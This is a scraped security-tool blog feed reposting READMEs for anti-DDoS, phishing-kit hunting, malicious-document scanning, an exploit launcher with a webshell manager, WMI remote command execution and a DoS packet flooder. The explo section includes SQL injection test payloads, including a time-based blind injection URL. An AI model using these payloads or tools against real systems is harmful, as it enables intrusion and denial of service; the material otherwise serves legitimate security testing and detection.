The above quickstart/installation script will install python if not present and download all the repo with the example config files, after that will be executed a bash script to setup some settings and a cron that will run every 30 minutes to check connections against common ipsets. You can find example config files under examples folder.

HTTPS Manually verification is executed with this command under the repository directory:

python nshield-main.py -ssl

The python script after reading the config will prompt you to insert an email address (For Let’s Encrypt) and change your domain DNS to the nShield server for SSL DNS Challenge confirmation. Example:

I Will generate SSL certs for sami.pw with Let's Encrypt DNS challenge
Insert your email address? (Used for cert Expiration and Let's Encrypt TOS agreement
samiii@protonmail.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Renewing an existing certificate
Performing the following challenges:
dns-01 challenge for sami.pw

-------------------------------------------------------------------------------
Please deploy a DNS TXT record under the name
_acme-challenge.sami.pw with the following value:

wFyeYk4yl-BERO6pKnMUA5EqwawUri5XnlD2-xjOAUk

Once this is deployed,
-------------------------------------------------------------------------------
Press Enter to Continue
Waiting for verification...
Cleaning up challenges

Now your domain is verified and a SSL cert is issued to Nginx configuration and you can change your A record to this server.

▼Advertisements

How it works

Basically this python script is set by default to run every 30 minutes and check the config file to execute these operations:

  • Get latest Bot,Spammers,Bad IP/Net reputation lists and blocks if those Bad guys are attacking your server (Thank you FireHol http://iplists.firehol.org/ )
  • Enables basic Anti-DDoS methods to deny unwanted/malicious traffic
  • Rate limits when under attack
  • Allows HTTP(S) Proxying to protect your site with an external proxy/server (You need to manually run SSL Verification first time)

 

 

https://github.com/fnzv/nShield

The post Anti-DDoS Solution Based on iptables: nShield appeared first on DigitalMunition.

PhishingKitHunter – Find Phishing Kits Which Use Your Brand/Organization’S Files And Image

May 25, 2017, 11:26 pm
$
0
0
p
Find phishing kits which use your brand/organization’s files and image.
PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, …). This tool – write in Python 3 – is based on the analysis of referer’s URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed. PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter’s config file.

Features

  • find URL where a phishing kit is deployed
  • find if the phishing kit is still up and running
  • generate a JSON report usefull for external usage
  • use a hash of the phishing kit’s page to identify the kit
  • use a timestamp for history
  • can use HTTP or SOCKS5 proxy

Usage

$ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

  _ \  |  / |   |             |
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|

-= Phishing Kit Hunter - v0.6b =-

[+] http://badscam.org/includes/ap/?a=2
  |   Timestamp: 01/May/2017:13:00:03
  | HTTP status: can't connect (HTTP Error 404: Not Found)
[+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
  |   Timestamp: 01/May/2017:13:00:49
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://badscam-er.com/eb/?e=4
  |   Timestamp: 01/May/2017:13:01:06
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
  |   Timestamp: 01/May/2017:13:01:14
  | HTTP status: UP
  | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
[+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
  |   Timestamp: 01/May/2017:13:01:15
  | HTTP status: UP
  | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
697475it [06:41, 1208.14it/s]

Help

$ ./PhishingKitHunter-0.6.py --help

  _ \  |  / |   |             |
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|

-= Phishing Kit Hunter - v0.6b =-

   -h --help   Prints this
   -i --ifile    Input logfile to analyse
   -o --ofile    Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
   -c --config   Configuration file to use (default: ./conf/defaults.conf)

JSON report example

$ cat ./PKHunter-report-20170502-013307.json

{
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
        "Domain": "badscam.org",
        "HTTP_sha256": "",
        "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
        "date": "01/May/2017:13:00:03"
    }
}{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
        "Domain": "assur.cam.tech",
        "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
        "HTTP_status": "UP",
        "date": "01/May/2017:13:01:14"
    }
}
[...]

▼Advertisements

Requirements

  • Python 3
  • requests
  • tqdm
  • json
  • PySocks

Install
Install the requirements

pip install -r requirements.txt

Configure
Please read the conf/default.conf file to learn how to configure PhishingKitHunter.

The post PhishingKitHunter – Find Phishing Kits Which Use Your Brand/Organization’S Files And Image appeared first on DigitalMunition.

Search

QuickSand.io – Tool For Scanning Streams Within Office Documents Plus Xor DB Attack

May 27, 2017, 8:48 pm
$
0
0
q
QuickSand is a compact C framework to analyze suspected malware documents to 1) identify exploits in streams of different encodings, 2) locate and extract embedded executables. By having the ability to locate embedded obfuscated executables, QuickSand could detect documents that contain zero-day or unknown obfuscated exploits.
File Formats For Exploit and Active Content Detection
  • doc, docx, docm, rtf, etc
  • ppt, pptx, pps, ppsx, etc
  • xls, xlsx, etc
  • mime mso
  • eml email
File Formats For Executable Detection
  • All of the above, plus PDF.
  • Any document format such as HWP.
Lite Version – Mplv2 License
  • Key dictionary up to 256 byte XOR
  • Bitwise ROL, ROR, NOT
  • Addition or substraction math cipher
  • Executable extraction: Windows, Mac, Linux, VBA
  • Exploit search
  • RTF pre processing
  • Hex stream extract
  • Base 64 Stream extract
  • Embedded Zip extract
  • ExOleObjStgCompressedAtom extract
  • zLib Decode
  • Mime Mso xml Decoding
  • OpenXML decode (unzip)
  • Yara signatures included: Executables, active content, exploits CVE 2014 and earlier
Example results and more info blog post
Full Version – Commercial License
  • Key cryptanalysis 1-1024 bytes factors of 2; or a specified odd size 1-1024 bytes
  • 1 Byte zerospace not replaced brute force XOR search
  • XOR Look Ahead cipher
  • More Yara signatures included: All lite plus most recent exploits 2014-2016 for CVE identification
  • Try the full version online at QuickSand.io
Dependencies (not included)
  • Yara 3.4+
  • zlib 1.2.1+
  • libzip 1.1.1+

▼Advertisements

Distributed components under their own licensing
  • MD5 by RSA Data Security, Inc.
  • SHA1 by Paul E. Jones
  • SHA2 by Aaron D. Gifford
  • jWrite by TonyWilk for json output
  • tinydir by Cong Xu, Baudouin Feildel for directory processing
Quick Start
  • ./build.sh
  • ./quicksand.out -h
  • ./quicksand.out malware.doc
Documentation

 

The post QuickSand.io – Tool For Scanning Streams Within Office Documents Plus Xor DB Attack appeared first on DigitalMunition.

massExpConsole – Collection of Tools and Exploits with a CLI UI

May 28, 2017, 9:06 pm
$
0
0
p

Collection of Tools and Exploits with a CLI UI

What does it do?

  • an easy-to-use user interface (cli)
  • execute any adapted exploit with process-level concurrency
  • crawler for baidu and zoomeye
  • a simple webshell manager
  • some built-in exploits (automated)
  • more to come…

Requirements

  • GNU/Linux or MacOS, WSL (Windows Subsystem Linux), fully tested under Kali Linux (Rolling, 2017), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
  • proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
  • Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven’t installed it yet
  • python packages (not complete, as some third-party scripts might need other deps as well):
    • requests
    • bs4
    • beautifulsoup4
    • html5lib
    • docopt
    • pip3 install on the go
  • note that you have to install all the deps of your exploits or tools as well

▼Advertisements

Usage

  • just run mec.py, if it complains about missing modules, install them
  • if you want to add your own exploit script (or binary file, whatever):
    • cd exploits, mkdir <yourExploitDir>
    • your exploit should take the last argument passed to it as its target, dig into mec.py to know more
    • chmod 755 <exploitBin> to make sure it can be executed by current user
    • use attack command then m to select your custom exploit
  • type help in the console to see all available features

 

The post massExpConsole – Collection of Tools and Exploits with a CLI UI appeared first on DigitalMunition.

WMI Command Shell Wrapper: WMIcmd

May 29, 2017, 11:06 pm
$
0
0
w

When doing low impact investigations and other similar activities you may want to minimize what is written to disk / obvious. This tool allows us to execute commands via WMI and get information not otherwise available via this channel.

 

Purpose

A small utility which only uses WMI to

  • execute command shell commands
  • capture stdout from these commands and write to the registry
  • read and then delete from the registry
  • print to local stdout

 

Design

The tool us comprised of:

  • a very small subset of the NCC Group internal core library (WMICore)
  • command execution (WMIcmd)

 

Usage

C:\Data\NCC\!Code\Git.Public\WMIcmd\WMIcmd\bin\Debug>WMIcmd.exe --help
NCC Group WMIcmd 1.0.0.0
Released under AGPL

  -h, --host            Host (IP address or hostname - default: localhost)

  -u, --username        Username to authenticate with

  -p, --password        Password to authenticate with

  -d, --domain          Domain to authenticate with

  -v, --Verbose         (Default: False) Prints all messages to standard
                        output.

  -c, --Command         (Default: ) Command to run e.g. "nestat-ano"

  -s, --CommandSleep    (Default: 10000) Command sleep in milliseconds -
                        increase if getting truncated output

  --help                Display this help screen.

▼Advertisements

Example – a non domain joined machine

Note: use administrative credentials

WMIcmd.exe -h 192.168.1.165 -d hostname -u localadmin -p theirpassword -c "netstat -an"

 

Example – domain joined machine

Note: use administrative credentials

WMIcmd.exe -h 192.168.1.165 -d domain -u domainadmin -p theirpassword -c "netstat -an"

 

Example expected output

Note: use administrative credentials

C:\Data\NCC\!Code\Git.Public\WMIcmd\WMIcmd\bin\Debug>WMIcmd.exe -d win10host -h win10host -u superuser -p password -c "netstat -an"
[!] Connecting with superuser
[i] Connecting to win10host
[i] Connected
[i] Command: netstat -an
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
Active Connections
Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING
TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
TCP    0.0.0.0:18800          0.0.0.0:0              LISTENING
TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49713          0.0.0.0:0              LISTENING
.. snip .

 

https://github.com/nccgroup/WMIcmd

The post WMI Command Shell Wrapper: WMIcmd appeared first on DigitalMunition.

explo – Human And Machine Readable Web Vulnerability Testing Format

May 29, 2017, 11:27 pm
$
0
0
e
explo is a simple tool to describe web security issues in a human and machine readable format. By defining a request/condition workflow, explo is able to exploit security issues without the need of writing a script. This allows to share complex vulnerabilities in a simple readable and executable format.

Example for extracting a csrf token and using this in a form: 
name: get_csrf
description: extract csrf token
module: http
parameter:
    url: http://example.com/contact
    method: GET
    header:
        user-agent: Mozilla/5.0
    extract:
        csrf: [CSS, "#csrf"]
---
name: exploit
description: exploits sql injection vulnerability with valid csrf token
module: http
parameter:
    url: http://example.com/contact
    method: POST
    body:
        csrf: "{{get_csrf.extracted.csrf}}"
        username: "' SQL INJECTION"
    find: You have an error in your SQL syntax

In this example definition file the security issue is tested by executing two steps which are run from top to bottom. The last step returns a success or failure, depending on the string ‘You have an error in your SQL syntax’ to be found.

Installation

Install via PyPI

pip install explo

Install via source

git clone https://github.com/dtag-dev-sec/explo
cd explo
python setup.py install

Usage

explo [--verbose|-v] testcase.yaml
explo [--verbose|-v] examples/*.yaml

There are a few example testcases in the examples/ folder.

$ explo examples/SQLI_simple_testphp.vulnweb.com.yaml

You can also include explo as a python lib:

from explo.core import from_content as explo_from_content
from explo.core import ExploException, ProxyException

def save_log(msg):
    print(msg)

try:
    result = explo_from_content(explo_yaml_file, save_log)
except ExploException as err:
    print(err)


Modules
Modules can be added to improve functionality and classes of security issues.

http (basic)
The http modules allows to make a http request, extract content and search/verify content.
The following data is made available for following steps:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
  • extracted content: response.extracted.variable_name

If a find_regex parameter is set, a regular expression match is executed on the response body. If this fails, this module returns a failure and thus stopping the executing of the current workflow (and all steps).
When extracting by regular expressions, use the match group extract to mark the value to extract (view below for an example).
For referencing cookies, reference the name of the previous step where cookies should be taken from (cookies: the_other_step.response.cookies).
Parameter examples:

parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    cookies: stepname.response.cookies
    body:
        key: value
    find: search for string
    find_regex: search for (reg|ular)expression
    find_in_headers: searchstring in headers
    extract:
        variable1: [CSS, '#csrf']
        variable2: [REGEX, '<input(.*?)value="(?P<extract>.*?)"']

http_header
The http header module allows to check if a response misses a specified set of headers (and values). All other parameters are identical to the http module.
The following data is made available for other modules:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies

Parameter examples:

parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    body:
        key: value
    headers_required:
        X-XSS-Protection: 1
        Server: .               # all values are valid

▼Advertisements

sqli_blind
The sqli_blind module is able to identify time based blind sql injections.
The following data is made available for other modules:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies

Parameter examples:

parameter:
    url: http://example.com/vulnerable.php?id=1' waitfor delay '00:00:5'--
    method: GET
    delay_seconds: 5

If the threshold of 5 seconds (delay_seconds) is exceeded, the check returns true (and thus resulting in a success).

The post explo – Human And Machine Readable Web Vulnerability Testing Format appeared first on DigitalMunition.

T50: Very Fast Network Packet Injector Tool

May 30, 2017, 9:52 pm
$
0
0
t

It is the fastest network packet injector. T50 Sukhoi PAK FA is a mixed as well as fastest network packet injector.

Or you can say that it is a kind of a packet injection free which is generated by Brazilian Nelson Brito who is capable of DoS and DDoS attacks by using the theory of stress testing.
With the help of this tool, you can send a very high number of requests for packets just like that the target will not be capable of gathering all over the requests as well as answer them slowly that’s why the target may fall or may be slow down.
Recently, the T50 is capable of copying the following requests:
  • More than one million(1,000,000) packets per second of SYN Flood i.e; +50% of the network uplink on a network 1000BASE-T which is also known as Gigabit Ethernet.
  • More than 120,000 packets per second of SYN Flood i.e; +60% of the network uplink in a 100BASE-TX(Fast Ethernet).
Whereas the T50 can also send requests for packets of the protocols ICMP, IGMP, UDP and TCP sequence with the difference of microseconds.

▼Advertisements

License:
 
GNU General Public License version 2.0 (GPLv2)
 
Features:
  • It supports many network protocols including TCP, UDP, and ICMP
  • It has more than 1,000,000 pps in gigabit networks.
  • It can simulate the attacks of DoS and DDoS

DOWNLOAD HERE

The post T50: Very Fast Network Packet Injector Tool appeared first on DigitalMunition.

Viewing all 236 articles
Browse latest View live
Search